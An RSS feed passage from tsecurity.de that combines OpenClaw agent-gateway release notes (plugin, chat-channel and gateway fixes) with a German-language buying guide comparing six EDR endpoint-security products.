href="https://github.com/openclaw/openclaw/issues/64606">#64606</a> as duplicate validation. Thanks @martingarramon, @NikolaFC, and @zeroth-blip.</li>
<li>Agents/model fallback: jump directly to a known later live-session model redirect instead of walking unrelated fallback candidates, while preserving the already-landed live-session/fallback loop guard. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4167179452" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/57471" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/57471/hovercard" href="https://github.com/openclaw/openclaw/issues/57471">#57471</a>; related loop family already closed via <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4181008782" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/58496" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/58496/hovercard" href="https://github.com/openclaw/openclaw/issues/58496">#58496</a>. Thanks @yuxiaoyang2007-prog.</li>
<li>Gateway/Bonjour: keep @homebridge/ciao cancellation handlers registered across advertiser restarts so late probing cancellations cannot crash Linux and other mDNS-churned gateways. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>.</li>
<li>Plugins/startup: load the default <code>memory-core</code> slot during Gateway startup when permitted so active-memory recall can call <code>memory_search</code> and <code>memory_get</code> without requiring an explicit <code>plugins.slots.memory</code> entry, while preserving <code>plugins.slots.memory: "none"</code>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>.</li>
<li>Gateway/plugins: resolve <code>gateway_start</code> cron hooks from live Gateway runtime state before the legacy deps fallback, so memory-core dreaming cron reconciliation keeps working on installs where <code>deps.cron</code> is not populated during service startup. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4336219364" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/72835" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/72835/hovercard" href="https://github.com/openclaw/openclaw/issues/72835">#72835</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/RayWoo/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/RayWoo">@RayWoo</a>.</li>
<li>Plugins/CLI: prefer native require for compiled bundled plugin JavaScript before jiti so read-only config, status, device, and node commands avoid unnecessary transform overhead on slow hosts. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4221630999" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/62842" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/62842/hovercard" href="https://github.com/openclaw/openclaw/issues/62842">#62842</a>. Thanks @Effet.</li>
<li>Plugins/compat: inventory doctor-side deprecation migrations separately from runtime plugin compatibility so release sweeps preserve needed repairs while enforcing dated removal windows. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>.</li>
<li>Plugins/compat: add missing dated compatibility records for legacy extension-api, memory registration, provider hook/type aliases, runtime aliases, channel SDK helpers, and approval/test utility shims. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>.</li>
<li>Plugins/CLI: refresh the persisted registry after managed plugin files are removed so ClawHub uninstall cannot leave stale <code>plugins list</code> entries. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>.</li>
<li>Plugins/CLI: make plugin install and uninstall config writes conflict-aware, clear stale denylist entries on explicit reinstall/removal, and delete managed plugin files only after config/index commit succeeds. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>.</li>
<li>Plugins: fail <code>plugins update</code> when tracked plugin or hook updates error, keep bundled runtime-dependency repair behind restrictive allowlists, and reject package installs with unloadable extension entries. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>.</li>
<li>WebChat/Control UI: support non-video file attachments in chat uploads while preserving the existing image attachment path and MIME-sniff fallback for generic image uploads. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4320611972" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/70947" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/70947/hovercard" href="https://github.com/openclaw/openclaw/pull/70947">#70947</a>) Thanks @IAMSamuelRodda.</li>
<li>Skills/memory: restore Chokidar v5 hot reloads by watching concrete skill and memory roots with filters, including SKILL.md removals and deleted skill folders without broad workspace recursion. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3994509566" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/27404" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/27404/hovercard" href="https://github.com/openclaw/openclaw/issues/27404">#27404</a>, <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4019092319" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/33585" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/33585/hovercard" href="https://github.com/openclaw/openclaw/issues/33585">#33585</a>, and <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4048900568" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/41606" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/41606/hovercard" href="https://github.com/openclaw/openclaw/issues/41606">#41606</a>. Thanks @shelvenzhou, @08820048, and @rocke2020.</li>
<li>Gateway/chat: keep duplicate attachment-backed <code>chat.send</code> retries with the same idempotency key on the documented in-flight path so aborts still target the real active run. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4308621432" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/70139" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/70139/hovercard" href="https://github.com/openclaw/openclaw/issues/70139">#70139</a>. Thanks @Feelw00.</li>
<li>Gateway/chat: preserve repeated boundary characters while merging assistant chat stream deltas, including repeated digits, CJK characters, and markdown/table tokens. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4232717737" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/63769" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/63769/hovercard" href="https://github.com/openclaw/openclaw/issues/63769">#63769</a>; carries forward <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4235786580" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/63994" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/63994/hovercard" href="https://github.com/openclaw/openclaw/pull/63994">#63994</a> and <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4248864686" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/65457" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/65457/hovercard" href="https://github.com/openclaw/openclaw/pull/65457">#65457</a>. Thanks @yon950905 and @mohuaxiao.</li>
<li>Plugins: share package entrypoint resolution between install and discovery, reject mismatched <code>runtimeExtensions</code>, and cache bundled runtime-dependency manifest reads during scans. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>.</li>
<li>WhatsApp/Web: keep quiet but healthy linked-device sessions connected by basing the watchdog on WhatsApp Web transport activity, while retaining a longer app-silence cap so frame activity cannot mask a stuck session forever. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4317373252" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/70678" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/70678/hovercard" href="https://github.com/openclaw/openclaw/issues/70678">#70678</a>; carries forward the focused <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4327494555" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/71466" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/71466/hovercard" href="https://github.com/openclaw/openclaw/pull/71466">#71466</a> approach and keeps <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4235211931" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/63939" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/63939/hovercard" href="https://github.com/openclaw/openclaw/pull/63939">#63939</a> as related configurable-timeout follow-up. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a> and @oromeis.</li>
<li>Discord/gateway: count failed health-monitor restart attempts toward cooldown and hourly caps, and evict stale account lifecycle state during channel reloads so repeated Discord gateway recovery cannot loop on old status. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4037442367" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/38596" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/38596/hovercard" href="https://github.com/openclaw/openclaw/issues/38596">#38596</a>. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4042713721" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/40413" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/40413/hovercard" href="https://github.com/openclaw/openclaw/pull/40413">#40413</a>) Thanks @jellyAI-dev and @vashquez.</li>
<li>TTS/BlueBubbles: pre-transcode synthesized MP3 audio to opus-in-CAF (mono, 24 kHz — validated against macOS 15.x Messages.app's native voice-memo CAF descriptor) on macOS hosts before handing the file to BlueBubbles, so iMessage renders the result as a native voice-memo bubble with proper duration and waveform UI instead of a plain file attachment. Adds an opt-in <code>tts.voice.preferAudioFileFormat</code> channel capability and a magic-byte sniff for the CAF container so the host-local-media validator (which uses <code>file-type</code> and didn't recognize CAF natively) can verify the pre-transcoded buffer. Channels that don't opt in are unaffected. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4333062668" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/72586" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/72586/hovercard" href="https://github.com/openclaw/openclaw/pull/72586">#72586</a>) Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4332675642" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/72506" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/72506/hovercard" href="https://github.com/openclaw/openclaw/issues/72506">#72506</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/omarshahine/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/omarshahine">@omarshahine</a>.</li>
<li>Feishu: retry WebSocket startup failures with monitor-owned backoff while preserving SDK-local heartbeat defaults, so persistent-connection startup failures no longer leave the monitor hung. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4289693476" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/68766" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/68766/hovercard" href="https://github.com/openclaw/openclaw/issues/68766">#68766</a>; related <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4052953463" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/42354" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/42354/hovercard" href="https://github.com/openclaw/openclaw/issues/42354">#42354</a> and <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4148985849" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/55532" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/55532/hovercard" href="https://github.com/openclaw/openclaw/issues/55532">#55532</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/alex-xuweilong/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/alex-xuweilong">@alex-xuweilong</a>, @120106835, @sirfengyu, and @tianhaocui.</li>
</ul>]]></content:encoded>
</item>
<item>
<title><![CDATA[EDR-Software – ein Kaufratgeber]]></title>
<description><![CDATA[EDR-Software verhindert Endpunkt-Sicherheitsdebakel. Die richtige Lösung vorausgesetzt.SvetaZi | shutterstock.com



Software im Bereich Endpoint Detection and Response (EDR) erfreut sich weiterhin steigender Beliebtheit – und wird mit zunehmender Reife immer effektiver. EDR-Lösungen bieten Realt...]]></description>
<link>https://tsecurity.de/de/3469861/it-security-nachrichten/edr-software-ein-kaufratgeber/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3469861/it-security-nachrichten/edr-software-ein-kaufratgeber/</guid>
<pubDate>Tue, 28 Apr 2026 06:05:45 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div>
		<div class="grid grid--cols-10@md grid--cols-8@lg article-column">
					  <div class="col-12 col-10@md col-6@lg col-start-3@lg">
						<div class="article-column__content">
<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>


<div class="extendedBlock-wrapper block-coreImage undefined"><figure class="wp-block-image size-large"><img loading="lazy" decoding="async" src="https://b2b-contenthub.com/wp-content/uploads/2024/12/SvetaZi_shutterstock_2184026203_16z9.jpg?quality=50&amp;strip=all&amp;w=1024" alt="Hands protecting red padlock 16z9" class="wp-image-3616112" width="1024" height="576" sizes="auto, (max-width: 1024px) 100vw, 1024px"><figcaption class="wp-element-caption">EDR-Software verhindert Endpunkt-Sicherheitsdebakel. Die richtige Lösung vorausgesetzt.</figcaption></figure><p class="imageCredit">SvetaZi | shutterstock.com</p></div>



<p>Software im Bereich Endpoint Detection and Response (EDR) erfreut sich weiterhin <a href="https://www.csoonline.com/article/3555624/edr-und-xdr-bleiben-wichtig.html" target="_blank">steigender Beliebtheit</a> – und wird mit zunehmender Reife immer effektiver. EDR-Lösungen bieten Realtime-Einblicke in die Endpunkt-Aktivitäten und ermöglichen es, Mobiltelefone, Workstations, Laptops, Server und andere Devices vor <a href="https://www.csoonline.com/article/3577944/diese-unternehmen-hats-schon-erwischt.html" target="_blank">Cyberangriffen</a> zu schützen.</p>



<p>In diesem Kaufratgeber erfahren Sie:</p>



<ul class="wp-block-list">
<li>wie sich Endpoint Detection and Response definiert,</li>



<li>welche Fähigkeiten EDR-Tools an Bord haben sollten,</li>



<li>welche Anbieter und Lösung in Sachen Endpunkt-Sicherheit tonangebend sind, und</li>



<li>welche konkreten Fragen vor einer Investition relevant sind.</li>
</ul>



<h2 class="wp-block-heading">Endpoint Detection and Response erklärt</h2>



<p>EDR-Tools erfassen Verhaltensdaten aus diversen Endpunkt-Quellen. Dazu gehören herkömmliche Computing Devices wie Windows- oder Mac-Rechner genauso wie Peripherie- und <a href="https://www.computerwoche.de/article/2775125/fuenf-tipps-fuer-den-umgang-mit-schatten-iot.html" target="_blank">IoT-Geräte</a>, beispielsweise Drucker oder Controller. Um IT-Profis auf verdächtige Aktivitäten oder laufende Cyberangriffe aufmerksam zu machen, analysieren Endpoint-Security-Lösungen zudem auch Signale aus:</p>



<ul class="wp-block-list">
<li>Netzwerk-Traffic-Mustern,</li>



<li>Cloud-Computing-Anwendungen und</li>



<li>Systemprotokollen.</li>
</ul>



<p>Das deckt die “Detection-Seite” ab. Mit Blick auf die “Response-Seite” sind EDR-Lösungen auch in der Lage, Schaden zu begrenzen und zu beheben. Zum Beispiel, indem sie auffällige Devices isolieren oder problematische Netzwerksegmente mit einer <a href="https://www.csoonline.com/article/3605017/das-gehort-in-ihr-security-toolset.html" target="_blank">Firewall</a> absichern. Je nachdem, wie das jeweilige Tool funktioniert, können diese Prozesse mehr oder weniger manuellen Aufwand erfordern.  </p>



<p>Schwierig ist hingegen mittlerweile, EDR von anderen Detection-Produktkategorien <a href="https://www.csoonline.com/article/3493047/cyberbedrohungen-erkennen-und-reagieren-was-ndr-edr-und-xdr-unterscheidet.html" target="_blank">zu unterscheiden</a>. Das beste Beispiel ist Extended Detection and Response (XDR): Inzwischen haben viele EDR-Lösungen deutlich an Umfang und Funktionen zugelegt, was dazu geführt hat, dass sie teilweise zu XDR “umetikettiert” wurden. Das lässt die Grenzen zwischen den Kategorien immer weiter verschwimmen.  </p>



<p>Die zunehmende Verschmelzung von EDR und XDR ist mit Blick auf den Detection-Gesamtmarkt jedoch nur ein Aspekt. Die Produkte in diesem Bereich laufen unter anderem auch unter folgenden Bezeichnungen:</p>



<ul class="wp-block-list">
<li>Network Detection and Response (NDR),</li>



<li><a href="https://www.csoonline.com/article/3493763/managed-detection-and-response-die-12-besten-mdr-anbieter.html" target="_blank">Managed Detection and Response</a> (MDR), oder</li>



<li><a href="https://www.csoonline.com/article/3513844/application-detection-and-response-is-the-gap-bridging-technology-we-need.html" target="_blank">Application Detection and Response</a> (ADR).</li>
</ul>



<h2 class="wp-block-heading">Was EDR-Tools leisten sollten</h2>



<p>Folgende Funktionen sollte eine hochwertige Endpoint-Security-Lösung mitbringen:</p>



<ul class="wp-block-list">
<li><strong>Fortschrittliche Threat-Detection-Funktionen: </strong>Effektive Endpoint-Detection-and-Response-Lösungen sind in der Lage, Events zu beobachten und in <a href="https://www.computerwoche.de/article/2804803/7-erfolgstipps-fuer-die-echtzeit-datenanalyse.html" target="_blank">Echtzeit</a> darauf zu reagieren. Sie sollten außerdem automatisch mit einer wachsenden Zahl von Netzwerken und Anwendungen skalieren können.</li>



<li><strong>Support für tiefgehende Untersuchungen:</strong> So können Security-Teams potenzielle Bedrohungen verstehen und möglichst zeitnah entsprechende Gegenmaßnahmen einleiten. </li>



<li><strong>Integrationsfähigkeit:</strong> EDR-Tools sollten sich mit diversen anderen Sicherheitslösungen integrieren lassen – etwa Firewalls, <a href="https://www.csoonline.com/article/3492608/was-ist-siem.html" target="_blank">SIEM</a>, <a href="https://www.csoonline.com/article/3494258/threat-intelligence-datenbanken-in-einem-soar-die-richtigen-spielzuge-gegen-hacker.html" target="_blank">SOAR</a> und Incident-Response-Tools. Das ermöglicht Anwenderunternehmen, Bedrohungsinformationen über <a href="https://www.computerwoche.de/article/2790525/was-sie-ueber-application-programming-interfaces-wissen-muessen.html" target="_blank">APIs</a> und Konnektoren systemübergreifend zu teilen.</li>



<li><strong>Zentralisierte Management-Funktionen und Analytics-Dashboards:</strong> Um ausufernde Schulungen zu vermeiden und jederzeit den Überblick über den aktuellen Status aller Endpunkte im Unternehmen zu wahren, sollte EDR-Software eine zentrale Konsole und <a href="https://www.computerwoche.de/article/2834992/in-7-schritten-zur-richtigen-datenplattform.html" target="_blank">Datenanalysen</a> bereitstellen.   </li>



<li><strong>Lückenloser Support für die fünf wesentlichen Endpoint-Betriebssysteme:</strong> Windows-, macOS-, Android-, iOS- und Linux-Devices sollten im Idealfall abgedeckt sein.</li>
</ul>



<h2 class="wp-block-heading">Die 6 wichtigsten Endpoint-Security-Lösungen</h2>



<p>Der Endpoint-Detection-and-Response-Markt hält unzählige Lösungen diverser Anbieter bereit. Um Sie nicht zu erschlagen, stellen wir Ihnen an dieser Stelle sechs bewährte und empfehlenswerte Lösungen namhafter Anbieter vor.</p>



<p><a href="https://www.crowdstrike.de/produkte/endpoint-security/falcon-insight-edr/" target="_blank" rel="noreferrer noopener"><strong>CrowdStrike Falcon Insight EDR</strong></a></p>



<p>Die Crowdstrike-Lösung kombiniert XDR- und EDR-Funktionen und soll (Advanced) Threats auf Android-, Chrome-OS-, iOS-, Linux-, macOS- und Windows-Geräten automatisch identifizieren und priorisieren. Zudem stellt Falcon Insight EDR Echtzeit-Response-Funktionalitäten zur Verfügung, um auf Endpunkte zuzugreifen, während sie untersucht werden.</p>



<p>Um schadhafte Aktivitäten automatisch zu identifizieren und zu klassifizieren, nutzt die Crowdstrike-Software KI-gestützte Angriffsindikatoren. Die automatisierte Alert-Priorisierung verspricht, manuelle Suchen und zeitaufwändige Recherche-Arbeiten überflüssig zu machen. Dank der integrierten <a href="https://www.csoonline.com/article/3493090/bottlenecks-auflosen-threat-intelligence-problemen-auf-der-spur.html" target="_blank">Threat-Intelligence</a>-Funktion kommt auch der übergeordnete Kontext von Cyberangriffen nicht zu kurz – inklusive Attribution.</p>



<p><a href="https://www.microsoft.com/de-de/security/business/endpoint-security/microsoft-defender-endpoint" target="_blank" rel="noreferrer noopener"><strong>Microsoft Defender for Endpoint</strong></a></p>



<p>Ransomware, <a href="https://en.wikipedia.org/wiki/Fileless_malware" data-type="link" data-id="https://en.wikipedia.org/wiki/Fileless_malware" target="_blank" rel="noreferrer noopener">Fileless Malware</a> und weitere raffinierte Angriffsmethoden verspricht Microsoft mit Defender for Endpoint den Wind aus den Segeln zu nehmen. Das Tool funktioniert auf Android, iOS, Linux, macOS und Windows. Die integrierten Threat-Analytics-Reportings sollen Unternehmen in die Lage versetzen:</p>



<ul class="wp-block-list">
<li>sich schnell einen Überblick über neu aufkommende Bedrohungen verschaffen zu können;</li>



<li>ihre Gefährdungslage evaluieren zu können; sowie</li>



<li>geeignete Gegenmaßnahmen zu definieren.</li>
</ul>



<p>Darüber hinaus überwacht Defender for Endpoint die Sicherheitskonfigurationen von Microsoft- und Drittanbieter-Produkten. Sollte die Software fündig werden, ergreift sie automatisiert Maßnahmen, um Risiken zu minimieren.</p>



<p><a href="https://www.paloaltonetworks.de/cortex/cortex-xdr" target="_blank" rel="noreferrer noopener"><strong>Palo Alto Networks Cortex XDR</strong></a></p>



<p>Cortex wurde von Palo Alto ursprünglich als EDR-Tool vermarktet. Inzwischen wurde die Lösung allerdings zu einem XDR-Produkt erweitert. Die Palo-Alto-Endpunktlösung deckt alle relevanten Betriebssysteme ab und integriert mit zahlreichen anderen Palo-Alto-Tools – etwa XSOAR.  </p>



<p>Auch diese Endpoint-Detection-and-Response-Lösung deckt automatisch Angriffsursachen und -sequenzen auf. Sie verspricht Anwendern außerdem, <a href="https://www.csoonline.com/article/3493521/false-positives-reduzieren-5-tipps-fur-weniger-security-alerts.html" target="_blank">Fehlalarme zu reduzieren</a> und damit der gefürchteten „Alert Fatigue“ ein Schnippchen zu schlagen.</p>



<p><a href="https://de.sentinelone.com/platform/singularity-complete/" target="_blank" rel="noreferrer noopener"><strong>SentinelOne Singularity</strong></a></p>



<p>Diese cloudbasierte Plattform von SentinelOne kombiniert EDR-Funktionen mit Workload Protection und Identity Threat Detection. Sie funktioniert mit Android-, iOS-, Linux-, macOS- und Windows-Geräten, sowie <a href="https://www.csoonline.com/article/3492006/kubernetes-security-wie-sie-ihre-cluster-besser-absichern.html" target="_blank">Kubernetes-Instanzen</a>.</p>



<p>Die Singularity-Plattform verspricht darüber hinaus:</p>



<ul class="wp-block-list">
<li>optimierte Bedrohungserkennung,</li>



<li>verkürzte Reaktionszeit bei Cybervorfällen sowie</li>



<li>eine effektive Risikominimierung.</li>
</ul>



<p>Darauf zahlen unter anderem auch die transparente Ausgestaltung der Plattform, ihre performanten Analytics-Funktionen sowie automatisierte Reaktionsfähigkeiten ein. Zu guter Letzt ist die Endpoint-Lösung von SentinelOne auch noch einfach zu implementieren, skalierbar und mit einem benutzerfreundlichen Interface ausgestattet.</p>



<p><a href="https://www.sophos.com/de-de/products/extended-detection-and-response" target="_blank" rel="noreferrer noopener"><strong>Sophos XDR</strong></a></p>



<p>Diese Endpoint-Security-Lösung nutzt Telemetriedaten verschiedener Sophos- und Secureworks-Produkte und kombiniert diese mit weiteren Daten anderer, externer Tools. Im Ergebnis steht eine Software, die EDR- und XDR-Funktionalitäten zusammenbringt. Auch mit Blick auf die Integrationsfähigkeit überzeugt Sophos XDR. Das Tool integriert mit:    </p>



<ul class="wp-block-list">
<li>Firewall-Produkten,</li>



<li>Identity-Lösungen,</li>



<li>Netzwerksicherheits-Tools,</li>



<li>Productivity-Apps,</li>



<li>E-Mail-Security-Lösungen,</li>



<li>Backup- und Recovery-Software sowie</li>



<li>Cloud-Instanzen.</li>
</ul>



<p>Mit seinen <a href="https://www.csoonline.com/article/3560109/security-tools-fur-ki-infrastrukturen-ein-kaufratgeber.html" target="_blank">Generative-AI</a>-Funktionen will Sophos XDR Security-Profis ermöglichen, Angreifer schneller zu neutralisieren. In Kombination mit dem Echtzeit-Schutz, der laufende Angriffe erkennt und automatisiert Abwehrmaßnahmen ergreift, steigt die Wahrscheinlichkeit, Cyberattacken abwehren zu können.  </p>



<p><a href="https://www.trendmicro.com/de_de/business/products/user-protection/sps/endpoint.html" target="_blank" rel="noreferrer noopener"><strong>Trend Micro Apex One</strong></a></p>



<p>Die Trend-Micro-Lösung Apex One ist in die Vision-One-Plattform des Sicherheitsanbieters integriert. Auch dieses Produkt bietet sowohl EDR- als auch XDR-Features und unterstützt Android, iOS, macOS und Windows. Linux-Systeme bleiben leider außen vor.</p>



<p>Apex One verspricht, vor <a href="https://www.computerwoche.de/article/2803863/was-ist-ein-zero-day-exploit.html" target="_blank">Zero-Day</a>-Bedrohungen schützen zu können – und zwar mit Hilfe einer Kombination aus Antimalware-Techniken und <a href="https://www.computerwoche.de/article/2798957/problemloeser-virtual-patching.html">virtuellem Patching</a>. Ransomware, Malware und bösartige Skripte sollen so keine Chance mehr haben, Endpunkte heimzusuchen. Um Security-Tools von Drittanbietern zu integrieren, bietet die Trend-Micro-Lösung eine Vielzahl von <a href="https://www.csoonline.com/article/3495478/api-security-die-10-besten-api-tools.html" target="_blank">APIs</a>.</p>



<h2 class="wp-block-heading">4 Fragen vor dem EDR-Investment</h2>



<p>Bevor Sie eine Kaufentscheidung in Sachen EDR treffen, sollten Sie sich, beziehungsweise dem Anbieter Ihrer Wahl einige Fragen stellen:</p>



<ol class="wp-block-list">
<li>Mit welchen anderen Sicherheits-Tools ist die Lösung integriert und wie wird das erreicht?</li>



<li>Wie unterscheidet die betreffende Lösung zwischen verdächtigen und böswilligen Verhaltensmustern?</li>



<li>Deckt die Software sämtliche relevanten Endpunkte ab und lässt sie sich auch auf größere Netzwerke skalieren?</li>



<li>Wie gut identifiziert das Tool Fehlalarme?</li>
</ol>



<p>(fm)</p>
</div></div></div></div>]]></content:encoded>
</item>
<item>
<title><![CDATA[OpenClaw 2026.4.26]]></title>
<description><![CDATA[2026.4.26
Changes

Channels/QQBot: add full group chat support (history tracking, @-mention gating, activation modes, per-group config, FIFO message queue with deliver debounce), C2C stream_messages streaming with a StreamingController lifecycle manager, unified sendMedia with chunked upload for ...]]></description>
<link>https://tsecurity.de/de/3469725/downloads/openclaw-2026426/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3469725/downloads/openclaw-2026426/</guid>
<pubDate>Tue, 28 Apr 2026 03:16:14 +0200</pubDate>
<category>💾 Downloads</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<h2>2026.4.26</h2>
<h3>Changes</h3>
<ul>
<li>Channels/QQBot: add full group chat support (history tracking, @-mention gating, activation modes, per-group config, FIFO message queue with deliver debounce), C2C <code>stream_messages</code> streaming with a <code>StreamingController</code> lifecycle manager, unified <code>sendMedia</code> with chunked upload for large files, and refactor the engine into pipeline stages, focused outbound submodules, builtin slash-command modules, and explicit DI ports via <code>createEngineAdapters()</code>. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4316471394" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/70624" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/70624/hovercard" href="https://github.com/openclaw/openclaw/pull/70624">#70624</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/cxyhhhhh/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/cxyhhhhh">@cxyhhhhh</a>.</li>
<li>Channels/Yuanbao: register the Tencent Yuanbao external channel plugin (<code>openclaw-plugin-yuanbao</code>) in the official channel catalog, contract suites, and community plugin docs, with a new <code>docs/channels/yuanbao.md</code> quick-start guide for WebSocket bot DMs and group chats. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4335031388" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/72756" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/72756/hovercard" href="https://github.com/openclaw/openclaw/pull/72756">#72756</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/loongfay/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/loongfay">@loongfay</a>.</li>
<li>Control UI/Talk: add a generic browser realtime transport contract, Google Live browser Talk sessions with constrained ephemeral tokens, and a Gateway relay for backend-only realtime voice plugins. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/VACInc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/VACInc">@VACInc</a>.</li>
